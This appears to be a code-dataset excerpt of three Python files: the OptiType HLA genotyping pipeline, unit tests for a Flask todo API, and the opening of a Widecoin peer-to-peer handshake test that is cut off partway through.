] | 137 | 2015-02-05T12:56:11.000Z | 2022-03-10T12:46:45.000Z | OptiTypePipeline.py | naumenko-sa/OptiType | 07c49bf6fc93e8846e8826df63100a0b069cbe40 | [
"BSD-3-Clause"
] | 98 | 2015-01-15T01:30:35.000Z | 2022-03-22T22:30:48.000Z | OptiTypePipeline.py | naumenko-sa/OptiType | 07c49bf6fc93e8846e8826df63100a0b069cbe40 | [
"BSD-3-Clause"
] | 76 | 2015-03-19T19:44:06.000Z | 2021-04-22T15:56:35.000Z | #!/usr/bin/env python
# coding=utf-8
"""
###################################################################
OptiType: precision HLA typing from next-generation sequencing data
###################################################################
Authors: András Szolek, Benjamin Schubert, Christopher Mohr
Date: August 2017
Version: 1.3.1
License: OptiType is released under a three-clause BSD license
Introduction:
-------------
OptiType is a novel HLA genotyping algorithm based on integer linear
programming, capable of producing accurate 4-digit HLA genotyping predictions
from NGS data by simultaneously selecting all minor and major HLA-I alleles.
Requirements:
-------------
OptiType uses the following software and libraries:
1) Python 2.7
2) Biopython 1.63
3) Pyomo 4.1
4) Matplotlib 1.3.1
5) Pandas 0.12 (with HDF5 support)
6) HDF5 1.8.11
7) RazerS 3.1
8) Cplex 12.5
Please make sure you have installed said software/libraries
and their dependencies.
Installation:
-------------
First install all required software and libraries and register the static path
in the configuration file for RazerS 3.1. CPLEX should be globally executable
via command line. Alternative ILP solvers supported by Pyomo are also usable.
Please do not change the folder structure or make sure you changed the necessary
entries in the config file.
Usage:
-------------
1) First filter the read files with the following settings:
>razers3 --percent-identity 90 --max-hits 1 --distance-range 0
--output-format sam --output sample_fished.sam
./data/hla_reference.fasta sample.fastq
where reference.fasta is either nuc_reference.fasta or gen_reference.fasta
depending on the type of NGS data. The references can be found in the ./data
sub-folder or in the supplementary material. To use the results as input
for OptiType the sam-files have to be converted into fastq format. On Unix-
based operating system you can convert from sam to fastq with the following
command:
>cat sample_fished.sam | grep -v ^@
| awk '{print "@"$1"\n"$10"\n+\n"$11}' > sample_fished.fastq
For paired-end data pre-process each file individually.
2) After pre-filtering, OptiType can be called as follows:
>python OptiTypePipeline.py -i sample_fished_1.fastq [sample_fished_2.fastq]
(--rna | --dna) [--beta BETA] [--enumerate ENUMERATE]
--o ./out_dir/
This will produce a CSV with the optimal typing and possible sub-optimal
typings if specified, as well as a coverage plot of the genotype for
diagnostic purposes and a HTML file containing a summary of the results.
>python OptiTypePipeline.py --help
usage: OptiType [-h] --input INPUT [INPUT ...] (--rna | --dna) [--beta BETA]
[--enumerate ENUMERATE] --outdir OUTDIR [--verbose]
OptiType: 4-digit HLA typer
optional arguments:
-h, --help show this help message and exit
--input INPUT [INPUT ...], -i INPUT [INPUT ...]
Fastq files with fished HLA reads. Max two files (for
paired-end)
--rna, -r Specifiying the mapped data as RNA.
--dna, -d Specifiying the mapped data as DNA.
--beta BETA, -b BETA The beta value for for homozygosity detection.
--enumerate ENUMERATE, -e ENUMERATE
The number of enumerations.
--outdir OUTDIR, -o OUTDIR
Specifies the out directory to which all files should
be written
--verbose, -v Set verbose mode on.
"""
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import zip
from builtins import filter
from builtins import map
from builtins import range
## eliminate dependency on an X11 server
import matplotlib
matplotlib.use('Agg')
import sys
import subprocess
import os
import argparse
if sys.version_info > (3,0):
import configparser
else:
import ConfigParser as configparser
import time
import datetime
import pandas as pd
import hlatyper as ht
import numpy as np
from model import OptiType
from collections import defaultdict
# Try to import pysam, important for RazerS 3 output format
try:
import pysam
PYSAM_AVAILABLE = True
except ImportError:
PYSAM_AVAILABLE = False
freq_alleles = '''A*01:01 A*01:02 A*01:03 A*01:06 A*01:09 A*01:23 A*01:38 A*01:44 A*02:01 A*02:02 A*02:03 A*02:04 A*02:05 A*02:06 A*02:07 A*02:08 A*02:09 A*02:10 A*02:11 A*02:12 A*02:13 A*02:133 A*02:14 A*02:141 A*02:146 A*02:15N A*02:16 A*02:17 A*02:18 A*02:19 A*02:20 A*02:21 A*02:22 A*02:226N A*02:24 A*02:25 A*02:26 A*02:27 A*02:28 A*02:29 A*02:30 A*02:33 A*02:34 A*02:35 A*02:36 A*02:37 A*02:38 A*02:40 A*02:42 A*02:44 A*02:45 A*02:46 A*02:48 A*02:49 A*02:51 A*02:53N A*02:54 A*02:55 A*02:57 A*02:58 A*02:60 A*02:64 A*02:67 A*02:74 A*02:85 A*02:90 A*02:93 A*03:01 A*03:02 A*03:05 A*03:07 A*03:08 A*03:10 A*03:12 A*03:22 A*03:25 A*03:65 A*03:69N A*03:97 A*11:01 A*11:02 A*11:03 A*11:04 A*11:05 A*11:06 A*11:08 A*11:10 A*11:12 A*11:13 A*11:18 A*11:19 A*11:20 A*11:29 A*11:40 A*23:01 A*23:02 A*23:03 A*23:04 A*23:05 A*23:09 A*24:02 A*24:03 A*24:04 A*24:05 A*24:06 A*24:07 A*24:08 A*24:09N A*24:10 A*24:13 A*24:14 A*24:15 A*24:17 A*24:18 A*24:20 A*24:21 A*24:22 A*24:23 A*24:24 A*24:25 A*24:26 A*24:27 A*24:28 A*24:29 A*24:31 A*24:35 A*24:46 A*24:51 A*24:56 A*24:63 A*24:93 A*25:01 A*25:02 A*25:04 A*26:01 A*26:02 A*26:03 A*26:04 A*26:05 A*26:06 A*26:07 A*26:08 A*26:09 A*26:10 A*26:11N A*26:12 A*26:14 A*26:15 A*26:16 A*26:17 A*26:18 A*26:20 A*26:49 A*29:01 A*29:02 A*29:03 A*29:04 A*29:10 A*29:12 A*30:01 A*30:02 A*30:03 A*30:04 A*30:06 A*30:08 A*30:09 A*30:10 A*30:11 A*30:12 A*30:16 A*31:01 A*31:02 A*31:03 A*31:04 A*31:05 A*31:06 A*31:08 A*31:09 A*31:12 A*32:01 A*32:02 A*32:03 A*32:04 A*32:05 A*32:06 A*32:08 A*32:13 A*32:20 A*32:22 A*33:01 A*33:03 A*33:04 A*33:05 A*33:10 A*33:26 A*34:01 A*34:02 A*34:03 A*34:05 A*36:01 A*36:03 A*43:01 A*66:01 A*66:02 A*66:03 A*68:01 A*68:02 A*68:03 A*68:04 A*68:05 A*68:06 A*68:07 A*68:08 A*68:12 A*68:13 A*68:15 A*68:16 A*68:17 A*68:18N A*68:23 A*68:24 A*68:38 A*69:01 A*74:01 A*74:02 A*74:03 A*74:04 A*74:06 A*74:09 A*74:11 A*80:01 A*80:02 B*07:02 B*07:03 B*07:04 B*07:05 B*07:06 B*07:07 B*07:08 B*07:09 B*07:10 B*07:12 B*07:13 B*07:14 B*07:15 B*07:17 
B*07:20 B*07:22 B*07:26 B*07:33 B*07:36 B*07:47 B*07:53 B*07:85 B*08:01 B*08:02 B*08:03 B*08:04 B*08:05 B*08:09 B*08:12 B*08:18 B*08:23 B*13:01 B*13:02 B*13:03 B*13:04 B*13:07N B*13:09 B*13:11 B*13:13 B*14:01 B*14:02 B*14:03 B*14:04 B*14:05 B*14:06 B*15:01 B*15:02 B*15:03 B*15:04 B*15:05 B*15:06 B*15:07 B*15:08 B*15:09 B*15:10 B*15:108 B*15:11 B*15:12 B*15:123 B*15:125 B*15:13 B*15:135 B*15:15 B*15:153 B*15:16 B*15:17 B*15:18 B*15:20 B*15:21 B*15:23 B*15:24 B*15:25 B*15:27 B*15:28 B*15:29 B*15:30 B*15:31 B*15:32 B*15:33 B*15:34 B*15:35 B*15:36 B*15:37 B*15:38 B*15:39 B*15:40 B*15:42 B*15:45 B*15:46 B*15:47 B*15:48 B*15:50 B*15:52 B*15:53 B*15:54 B*15:55 B*15:56 B*15:58 B*15:61 B*15:63 B*15:67 B*15:68 B*15:70 B*15:71 B*15:73 B*15:82 B*15:86 B*18:01 B*18:02 B*18:03 B*18:04 B*18:05 B*18:06 B*18:07 B*18:08 B*18:09 B*18:11 B*18:13 B*18:14 B*18:18 B*18:19 B*18:20 B*18:28 B*18:33 B*27:01 B*27:02 B*27:03 B*27:04 B*27:05 B*27:06 B*27:07 B*27:08 B*27:09 B*27:10 B*27:11 B*27:12 B*27:13 B*27:14 B*27:19 B*27:20 B*27:21 B*27:30 B*27:39 B*35:01 B*35:02 B*35:03 B*35:04 B*35:05 B*35:06 B*35:08 B*35:09 B*35:10 B*35:11 B*35:12 B*35:13 B*35:14 B*35:15 B*35:16 B*35:17 B*35:18 B*35:19 B*35:20 B*35:21 B*35:22 B*35:23 B*35:24 B*35:25 B*35:27 B*35:28 B*35:29 B*35:30 B*35:31 B*35:32 B*35:33 B*35:34 B*35:36 B*35:43 B*35:46 B*35:51 B*35:77 B*35:89 B*37:01 B*37:02 B*37:04 B*37:05 B*38:01 B*38:02 B*38:04 B*38:05 B*38:06 B*38:15 B*39:01 B*39:02 B*39:03 B*39:04 B*39:05 B*39:06 B*39:07 B*39:08 B*39:09 B*39:10 B*39:11 B*39:12 B*39:13 B*39:14 B*39:15 B*39:23 B*39:24 B*39:31 B*39:34 B*40:01 B*40:02 B*40:03 B*40:04 B*40:05 B*40:06 B*40:07 B*40:08 B*40:09 B*40:10 B*40:11 B*40:12 B*40:14 B*40:15 B*40:16 B*40:18 B*40:19 B*40:20 B*40:21 B*40:23 B*40:27 B*40:31 B*40:35 B*40:36 B*40:37 B*40:38 B*40:39 B*40:40 B*40:42 B*40:44 B*40:49 B*40:50 B*40:52 B*40:64 B*40:80 B*41:01 B*41:02 B*41:03 B*42:01 B*42:02 B*44:02 B*44:03 B*44:04 B*44:05 B*44:06 B*44:07 B*44:08 B*44:09 B*44:10 B*44:12 B*44:13 B*44:15 B*44:18 
B*44:20 B*44:21 B*44:22 B*44:26 B*44:27 B*44:29 B*44:31 B*44:59 B*45:01 B*45:02 B*45:04 B*45:06 B*46:01 B*46:02 B*46:13 B*47:01 B*47:02 B*47:03 B*48:01 B*48:02 B*48:03 B*48:04 B*48:05 B*48:06 B*48:07 B*48:08 B*49:01 B*49:02 B*49:03 B*50:01 B*50:02 B*50:04 B*50:05 B*51:01 B*51:02 B*51:03 B*51:04 B*51:05 B*51:06 B*51:07 B*51:08 B*51:09 B*51:10 B*51:12 B*51:13 B*51:14 B*51:15 B*51:18 B*51:21 B*51:22 B*51:27N B*51:29 B*51:31 B*51:32 B*51:33 B*51:34 B*51:36 B*51:37 B*51:63 B*51:65 B*52:01 B*52:02 B*52:06 B*53:01 B*53:02 B*53:03 B*53:04 B*53:05 B*53:07 B*53:08 B*54:01 B*54:02 B*55:01 B*55:02 B*55:03 B*55:04 B*55:07 B*55:08 B*55:10 B*55:12 B*55:16 B*55:46 B*56:01 B*56:02 B*56:03 B*56:04 B*56:05 B*56:06 B*56:07 B*56:09 B*56:11 B*57:01 B*57:02 B*57:03 B*57:04 B*57:05 B*57:06 B*57:10 B*58:01 B*58:02 B*58:06 B*59:01 B*67:01 B*67:02 B*73:01 B*78:01 B*78:02 B*78:03 B*78:05 B*81:01 B*81:02 B*82:01 B*82:02 B*83:01 C*01:02 C*01:03 C*01:04 C*01:05 C*01:06 C*01:08 C*01:14 C*01:17 C*01:30 C*01:32 C*02:02 C*02:03 C*02:04 C*02:06 C*02:08 C*02:09 C*02:10 C*02:19 C*02:20 C*02:27 C*03:02 C*03:03 C*03:04 C*03:05 C*03:06 C*03:07 C*03:08 C*03:09 C*03:10 C*03:13 C*03:14 C*03:15 C*03:16 C*03:17 C*03:19 C*03:21 C*03:32 C*03:42 C*03:43 C*03:56 C*03:67 C*03:81 C*04:01 C*04:03 C*04:04 C*04:05 C*04:06 C*04:07 C*04:10 C*04:11 C*04:14 C*04:15 C*04:24 C*04:29 C*04:33 C*04:37 C*05:01 C*05:03 C*05:04 C*05:07N C*05:09 C*06:02 C*06:03 C*06:04 C*06:06 C*06:08 C*06:09 C*06:17 C*06:24 C*06:53 C*07:01 C*07:02 C*07:03 C*07:04 C*07:05 C*07:06 C*07:07 C*07:08 C*07:09 C*07:10 C*07:109 C*07:123 C*07:13 C*07:14 C*07:17 C*07:18 C*07:19 C*07:21 C*07:22 C*07:27 C*07:29 C*07:32N C*07:37 C*07:43 C*07:46 C*07:49 C*07:56 C*07:66 C*07:67 C*07:68 C*07:80 C*07:95 C*08:01 C*08:02 C*08:03 C*08:04 C*08:05 C*08:06 C*08:13 C*08:15 C*08:20 C*08:21 C*08:27 C*12:02 C*12:03 C*12:04 C*12:05 C*12:07 C*12:12 C*12:15 C*12:16 C*14:02 C*14:03 C*14:04 C*15:02 C*15:03 C*15:04 C*15:05 C*15:06 C*15:07 C*15:08 C*15:09 C*15:11 C*15:12 C*15:13 
C*15:17 C*16:01 C*16:02 C*16:04 C*16:08 C*16:09 C*17:01 C*17:02 C*17:03 C*17:04 C*18:01 C*18:02 A*30:07 B*15:64 B*18:12'''.split(' ')
def is_frequent(allele_id):
    """Return True for alleles in the common-allele list (flags == 0) or on
    a non-classical locus (H, G, J).

    NOTE(review): relies on the module-global `table` (allele metadata)
    being initialized before the first call.
    """
    # For reconstructed IDs like HLA12345_HLA67890, judge by the first part.
    row = table.loc[allele_id.split('_')[0]]
    is_common = row['4digit'] in freq_alleles and row['flags'] == 0
    return is_common or row['locus'] in 'HGJ'
def get_4digit(allele_id):
    """Map an allele ID to its 4-digit type. For reconstructed IDs like
    HLA12345_HLA67890, HLA12345's 4-digit type is returned."""
    first_id, _, _ = allele_id.partition('_')
    return table.loc[first_id]['4digit']
def get_types(allele_id):
    """Translate an allele ID into its 4-digit type; non-string input is
    passed through unchanged."""
    if not isinstance(allele_id, str):
        return allele_id
    # Only the first component of a reconstructed pair (ID1_ID2) determines
    # the reported 4-digit type — reporting of the second half is
    # deliberately disabled upstream.
    parts = allele_id.split('_')
    return table.loc[parts[0]]['4digit']
def get_num_threads(configured_threads):
    """Cap the configured thread count at the machine's CPU count.

    Falls back to 2 threads when the multiprocessing module is not
    available on this platform.
    """
    try:
        import multiprocessing
    except (ImportError, NotImplementedError):
        return 2
    return min(multiprocessing.cpu_count(), configured_threads)
if __name__ == '__main__':
this_dir = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
config_default = os.path.join(this_dir, 'config.ini')
parser = argparse.ArgumentParser(description=' OptiType: 4-digit HLA typer', prog='OptiType')
parser.add_argument('--input','-i',
nargs='+',
required=True,
metavar='FQ',
help=(".fastq file(s) (fished or raw) or .bam files stored for re-use, generated by "
"an earlier OptiType run. One file: single-end mode, two files: paired-end mode.")
)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--rna','-r',
action="store_true",
help="Use with RNA sequencing data."
)
group.add_argument('--dna','-d',
action="store_true",
help="Use with DNA sequencing data."
)
parser.add_argument('--beta','-b',
type=float,
metavar='B',
default=0.009,
help="The beta value for for homozygosity detection (see paper). Default: 0.009. Handle with care."
)
parser.add_argument('--enumerate','-e',
type=int,
default=1,
metavar='N',
help=("Number of enumerations. OptiType will output the optimal solution and "
"the top N-1 suboptimal solutions in the results CSV. Default: 1")
)
parser.add_argument('--outdir','-o',
required=True,
help="Specifies the out directory to which all files should be written."
)
parser.add_argument('--prefix', '-p',
default=None, dest="prefix", type=str,
help="Specifies prefix of output files"
)
parser.add_argument('--verbose','-v',
required=False,
action="store_true",
help="Set verbose mode on."
)
parser.add_argument('--config', '-c',
type=argparse.FileType('r'),
default=config_default,
help="Path to config file. Default: config.ini in the same directory as this script"
)
args = parser.parse_args()
if not os.path.isfile(args.config.name):
print ("Config file not found. Place config.ini either alongside this script or use the -c option. "
"See config.ini.example and note that its fields have changed recently.")
sys.exit(-1)
config = configparser.ConfigParser(os.environ)
config.read(args.config.name)
unpaired_weight = config.getfloat('behavior', 'unpaired_weight')
use_discordant = config.getboolean('behavior', 'use_discordant')
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
# test if inputs are legit:
if args.beta < 0.0 or args.beta >= 0.1:
print("Beta value is not correctly chosen. Please choose another beta value between [0,0.1]")
sys.exit(-1)
if args.enumerate <= 0:
print("The specified number of enumerations must be bigger than %i"%args.enumeration)
sys.exit(-1)
if len(args.input) not in (1, 2):
print("Number of input files can only be 1 (single-end) or 2 (paired-end)")
sys.exit(-1)
input_extension = args.input[0].split('.')[-1]
assert all(ii.endswith('.' + input_extension) for ii in args.input), 'Mixed input file extensions'
bam_input = (input_extension in ('sam', 'bam', 'SAM', 'BAM')) # otherwise treated as fastq
# Constants
VERBOSE = ht.VERBOSE = bool(args.verbose) # set verbosity setting in hlatyper too
COMMAND = "-i 97 -m 99999 --distance-range 0 -pa -tc %d -o %s %s %s"
ALLELE_HDF = os.path.join(this_dir, 'data/alleles.h5')
MAPPING_REF = {'gen': os.path.join(this_dir, 'data/hla_reference_dna.fasta'),
'nuc': os.path.join(this_dir, 'data/hla_reference_rna.fasta')}
MAPPING_CMD = config.get("mapping", "razers3") + " " + COMMAND
date = datetime.datetime.fromtimestamp(time.time()).strftime('%Y_%m_%d_%H_%M_%S')
if args.prefix == None:
prefix = date
out_dir = os.path.join(args.outdir, date)
else:
prefix = args.prefix
out_dir = args.outdir
if not os.path.exists(out_dir):
os.makedirs(out_dir)
if PYSAM_AVAILABLE:
extension = 'bam'
else:
extension = 'sam'
bam_paths = args.input if bam_input else [os.path.join(out_dir, ("%s_%i.%s" % (prefix, i+1, extension))) for i in range(len(args.input))]
# SETUP variables and OUTPUT samples
ref_type = "nuc" if args.rna else "gen"
is_paired = len(args.input) > 1
out_csv = os.path.join(out_dir, ("%s_result.tsv" % prefix))
out_plot = os.path.join(out_dir, ("%s_coverage_plot.pdf" % prefix))
# mapping fished file to reference
if not bam_input:
threads = get_num_threads(config.getint("mapping", "threads"))
if VERBOSE:
print("\nmapping with %s threads..." % threads)
for (i, sample), outbam in zip(enumerate(args.input), bam_paths):
if VERBOSE:
print("\n", ht.now(), "Mapping %s to %s reference..." % (os.path.basename(sample), ref_type.upper()))
subprocess.call(MAPPING_CMD % (threads, outbam,
MAPPING_REF[ref_type], sample), shell=True)
# sam-to-hdf5
table, features = ht.load_hdf(ALLELE_HDF, False, 'table', 'features')
if VERBOSE:
print("\n", ht.now(), "Generating binary hit matrix.")
if is_paired:
# combine matrices for paired-end mapping
pos, read_details = ht.pysam_to_hdf(bam_paths[0])
binary1 = np.sign(pos) # dtype=np.uint16
pos2, read_details2 = ht.pysam_to_hdf(bam_paths[1])
binary2 = np.sign(pos2) # dtype=np.uint16
if not bam_input and config.getboolean('behavior', 'deletebam'):
os.remove(bam_paths[0])
os.remove(bam_paths[1])
id1 = set(binary1.index)
id2 = set(binary2.index)
'''
test if we actually can do paired-end mapping
1) look at the last character 2-1 character if they are always the same if so -> proon them away and do
paired-end
2) if not test if the intersection of ID-binary1 and ID-binary2 has at least 10% of the former read
number -> do paired-end
3) if nothing worked ( perhaps pair-end ID was in the middle or something) raise flag and do single-end
mapping on first input
'''
if len(set([r[-1] for r in id1])) == 1 and len(set([r[-1] for r in id2])) == 1:
# if this case is true you have to edit also all pos,etc,desc indices such that the plotting works correctly
# again .. maybe it is also neccessary to test for the last two characters
cut_last_char = lambda x: x[:-1]
binary1.index = list(map(cut_last_char, binary1.index))
binary2.index = list(map(cut_last_char, binary2.index))
pos.index = list(map(cut_last_char, pos.index))
pos2.index = list(map(cut_last_char, pos2.index))
read_details.index = list(map(cut_last_char, read_details.index))
read_details2.index = list(map(cut_last_char, read_details2.index))
binary_p, binary_mis, binary_un = ht.create_paired_matrix(binary1, binary2)
if binary_p.shape[0] < len(id1) * 0.1:
print(("\nWARNING: Less than 10%% of reads could be paired. Consider an appropriate unpaired_weight setting "
"in your config file (currently %.3f), because you may need to resort to using unpaired reads.") % unpaired_weight)
if unpaired_weight > 0:
if use_discordant:
binary = pd.concat([binary_p, binary_un, binary_mis])
else:
binary = pd.concat([binary_p, binary_un])
else:
binary = binary_p
else:
pos, read_details = ht.pysam_to_hdf(bam_paths[0])
if not bam_input and config.getboolean('behavior', 'deletebam'):
os.remove(bam_paths[0])
binary = np.sign(pos) # dtype=np.uint16
# dimensionality reduction and typing
alleles_to_keep = list(filter(is_frequent, binary.columns))
binary = binary[alleles_to_keep]
if VERBOSE:
print("\n", ht.now(), 'temporary pruning of identical rows and columns')
unique_col, representing = ht.prune_identical_alleles(binary, report_groups=True)
representing_df = pd.DataFrame([[a1, a2] for a1, a_l in representing.items() for a2 in a_l],
columns=['representative', 'represented'])
temp_pruned = ht.prune_identical_reads(unique_col)
if VERBOSE:
print("\n", ht.now(), 'Size of mtx with unique rows and columns:', temp_pruned.shape)
print(ht.now(), 'determining minimal set of non-overshadowed alleles')
minimal_alleles = ht.prune_overshadowed_alleles(temp_pruned)
if VERBOSE:
print("\n", ht.now(), 'Keeping only the minimal number of required alleles', minimal_alleles.shape)
binary = binary[minimal_alleles]
if VERBOSE:
print("\n", ht.now(), 'Creating compact model...')
if is_paired and unpaired_weight > 0:
if use_discordant:
compact_mtx, compact_occ = ht.get_compact_model(binary_p[minimal_alleles],
pd.concat([binary_un, binary_mis])[minimal_alleles], weight=unpaired_weight)
else:
compact_mtx, compact_occ = ht.get_compact_model(binary_p[minimal_alleles],
binary_un[minimal_alleles], weight=unpaired_weight)
else:
compact_mtx, compact_occ = ht.get_compact_model(binary)
allele_ids = binary.columns
groups_4digit = defaultdict(list)
for allele in allele_ids:
type_4digit = get_4digit(allele)
groups_4digit[type_4digit].append(allele)
sparse_dict = ht.mtx_to_sparse_dict(compact_mtx)
threads = get_num_threads(config.getint("ilp", "threads"))
if VERBOSE:
print("\nstarting ilp solver with %s threads..." % threads)
print("\n", ht.now(), 'Initializing OptiType model...')
op = OptiType(sparse_dict, compact_occ, groups_4digit, table, args.beta, 2,
config.get("ilp", "solver"), threads, verbosity=VERBOSE)
result = op.solve(args.enumerate)
if VERBOSE:
print("\n", ht.now(), 'Result dataframe has been constructed...')
result_4digit = result.applymap(get_types)
for iii in ["A1", "A2", "B1", "B2", "C1", "C2"]:
if not iii in result_4digit:
result_4digit[iii] = None
r = result_4digit[["A1", "A2", "B1", "B2", "C1", "C2", "nof_reads", "obj"]]
# write CSV to out. And generate plots
r.to_csv(out_csv, sep="\t",
columns=["A1", "A2", "B1", "B2", "C1", "C2", "nof_reads", "obj"],
header=["A1", "A2", "B1", "B2", "C1", "C2", "Reads", "Objective"])
hlatype = result.iloc[0].reindex(["A1", "A2", "B1", "B2", "C1", "C2"]).drop_duplicates().dropna()
features_used = [('intron', 1), ('exon', 2), ('intron', 2), ('exon', 3), ('intron', 3)] \
if not args.rna else [('exon',2),('exon',3)]
plot_variables = [pos, read_details, pos2, read_details2, (binary_p, binary_un, binary_mis)] if is_paired else [pos, read_details]
coverage_mat = ht.calculate_coverage(plot_variables, features, hlatype, features_used)
ht.plot_coverage(out_plot, coverage_mat, table, features, features_used)
| 53.550228 | 6,125 | 0.622724 |
52373d3ee0f44542bfffa8e81425bb9ba57f03df | 4,686 | py | Python | tests.py | squadran2003/TODO-api-with-flask | 50556c9a78c8a100ff67a5531c08688e48730ffe | [
"MIT"
] | null | null | null | tests.py | squadran2003/TODO-api-with-flask | 50556c9a78c8a100ff67a5531c08688e48730ffe | [
"MIT"
] | null | null | null | tests.py | squadran2003/TODO-api-with-flask | 50556c9a78c8a100ff67a5531c08688e48730ffe | [
"MIT"
] | null | null | null | import unittest
import datetime
import json
from app import app
import base64
from flask.ext.restful import url_for
import models
class TestTodoModel(unittest.TestCase):
def setUp(self):
self.user = models.User.get(username="andy")
self.todo = models.Todo.create(name="go swimming at 10",
user=self.user)
self.assertNotEqual(self.todo.created_at, datetime.datetime.now)
def test_todo_list(self):
todos = models.Todo.select().where(models.Todo.user == self.user)
self.assertIn(self.todo, todos)
class TestUserModel(unittest.TestCase):
def setUp(self):
self.user = models.User.get(username="andy")
def test_user_list(self):
users = models.User.select()
self.assertIn(self.user, users)
class TestTodoApi(unittest.TestCase):
def setUp(self):
self.user = models.User.get(username="andy")
self.client = app.test_client()
self.headers = {
'Authorization':
'Basic %s' % base64.b64encode(b"andy:123").decode("ascii")
}
self.todo = models.Todo.create(name="Get Milk from the shops",
user=self.user)
def test_todos_get(self):
response = self.client.get(url_for('resources.todos.todos'),
headers=self.headers)
myresponse = json.loads(response.get_data())
self.assertTrue(self.check_id_in_json(myresponse, self.todo.id))
def test_todos_post(self):
response = self.client.post(url_for('resources.todos.todos'),
data={'name': 'Go jogging at 10am',
'user': self.user
}, headers=self.headers)
myresponse = json.loads(response.get_data())
self.assertEqual('Go jogging at 10am', myresponse.get('name'))
def test_todos_put(self):
response = self.client.put(url_for('resources.todos.todos'),
data={'id': self.todo.id,
'name': 'Go jogging at 10am',
'user': self.user
}, headers=self.headers)
self.assertNotEqual(response.status_code, 404)
def test_todos_delete(self):
response = self.client.delete(url_for('resources.todos.todos'),
data={'id': self.todo.id,
'name': 'Go jogging at 10am'},
headers=self.headers)
self.assertNotEqual(response.status_code, 404)
def check_id_in_json(self, json_string, id):
"""this method takes a jsonstring and an id,
loops over the json data and checks if the id is in
its values"""
for mydict in json_string:
if id in mydict.values():
return True
class TestUsersApi(unittest.TestCase):
def setUp(self):
self.user = models.User.get(username="andy")
self.client = app.test_client()
self.headers = {
'Authorization':
'Basic %s' % base64.b64encode(b"andy:123").decode("ascii")
}
self.token = ""
def test_users_get(self):
response = self.client.get(url_for('resources.users.users'))
myresponse = json.loads(response.get_data())
self.assertTrue(self.check_username_in_json(myresponse))
def test_user_token(self):
"""this method tests to see if a token is returned"""
response = self.client.get('/api/v1/users/token', headers=self.headers)
myresponse = json.loads(response.get_data())
self.token = myresponse.get('token')
self.assertNotEqual(myresponse, [])
def test_user_token_auth(self):
"""this method will test that the token work
when used as a auth method"""
token_header = {'Authorization': 'token '+self.token}
response = self.client.get(
url_for('resources.todos.todos'),
headers=token_header
)
self.assertTrue(response, 200)
def check_username_in_json(self, json_string):
"""this method takes a jsonstring and an id,
loops over the json data and checks if the id is in
its values"""
for mydict in json_string:
if self.user.username in mydict.values():
return True
if __name__ == '__main__':
app.config['SERVER_NAME'] = '127.0.0.1:8000'
with app.app_context():
unittest.main()
| 36.609375 | 79 | 0.567222 |
06e0a61335b751c4642608486cadb72acd2cff25 | 7,395 | py | Python | test/functional/p2p_leak.py | widecoin-project/widecoin | 143b190a61f95a4b7d40c5da484cdde8f0c5ac3f | [
"MIT"
] | 8 | 2021-04-17T16:11:50.000Z | 2021-06-23T05:30:39.000Z | test/functional/p2p_leak.py | widecoin-project/widecoin | 143b190a61f95a4b7d40c5da484cdde8f0c5ac3f | [
"MIT"
] | 1 | 2021-04-18T11:57:59.000Z | 2021-04-18T11:57:59.000Z | test/functional/p2p_leak.py | widecoin-project/widecoin | 143b190a61f95a4b7d40c5da484cdde8f0c5ac3f | [
"MIT"
] | 7 | 2021-04-17T16:04:12.000Z | 2021-06-10T00:54:53.000Z | #!/usr/bin/env python3
# Copyright (c) 2017-2020 The Widecoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test message sending before handshake completion.
Before receiving a VERACK, a node should not send anything but VERSION/VERACK
and feature negotiation messages (WTXIDRELAY, SENDADDRV2).
This test connects to a node and sends it a few messages, trying to entice it
into sending us something it shouldn't."""
import time
from test_framework.messages import (
msg_getaddr,
msg_ping,
msg_version,
)
from test_framework.p2p import (
P2PInterface,
P2P_SUBVERSION,
P2P_SERVICES,
P2P_VERSION_RELAY,
)
from test_framework.test_framework import WidecoinTestFramework
from test_framework.util import (
assert_equal,
assert_greater_than_or_equal,
)
PEER_TIMEOUT = 3
class LazyPeer(P2PInterface):
def __init__(self):
super().__init__()
self.unexpected_msg = False
self.ever_connected = False
self.got_wtxidrelay = False
self.got_sendaddrv2 = False
def bad_message(self, message):
self.unexpected_msg = True
print("should not have received message: %s" % message.msgtype)
def on_open(self):
self.ever_connected = True
# Does not respond to "version" with "verack"
def on_version(self, message): self.bad_message(message)
def on_verack(self, message): self.bad_message(message)
def on_inv(self, message): self.bad_message(message)
def on_addr(self, message): self.bad_message(message)
def on_getdata(self, message): self.bad_message(message)
def on_getblocks(self, message): self.bad_message(message)
def on_tx(self, message): self.bad_message(message)
def on_block(self, message): self.bad_message(message)
def on_getaddr(self, message): self.bad_message(message)
def on_headers(self, message): self.bad_message(message)
def on_getheaders(self, message): self.bad_message(message)
def on_ping(self, message): self.bad_message(message)
def on_mempool(self, message): self.bad_message(message)
def on_pong(self, message): self.bad_message(message)
def on_feefilter(self, message): self.bad_message(message)
def on_sendheaders(self, message): self.bad_message(message)
def on_sendcmpct(self, message): self.bad_message(message)
def on_cmpctblock(self, message): self.bad_message(message)
def on_getblocktxn(self, message): self.bad_message(message)
def on_blocktxn(self, message): self.bad_message(message)
def on_wtxidrelay(self, message): self.got_wtxidrelay = True
def on_sendaddrv2(self, message): self.got_sendaddrv2 = True
# Peer that sends a version but not a verack.
class NoVerackIdlePeer(LazyPeer):
def __init__(self):
self.version_received = False
super().__init__()
def on_verack(self, message): pass
# When version is received, don't reply with a verack. Instead, see if the
# node will give us a message that it shouldn't. This is not an exhaustive
# list!
def on_version(self, message):
self.version_received = True
self.send_message(msg_ping())
self.send_message(msg_getaddr())
class P2PVersionStore(P2PInterface):
version_received = None
def on_version(self, msg):
# Responds with an appropriate verack
super().on_version(msg)
self.version_received = msg
class P2PLeakTest(WidecoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [[f"-peertimeout={PEER_TIMEOUT}"]]
def create_old_version(self, nversion):
old_version_msg = msg_version()
old_version_msg.nVersion = nversion
old_version_msg.strSubVer = P2P_SUBVERSION
old_version_msg.nServices = P2P_SERVICES
old_version_msg.relay = P2P_VERSION_RELAY
return old_version_msg
def run_test(self):
self.log.info('Check that the node doesn\'t send unexpected messages before handshake completion')
# Peer that never sends a version, nor any other messages. It shouldn't receive anything from the node.
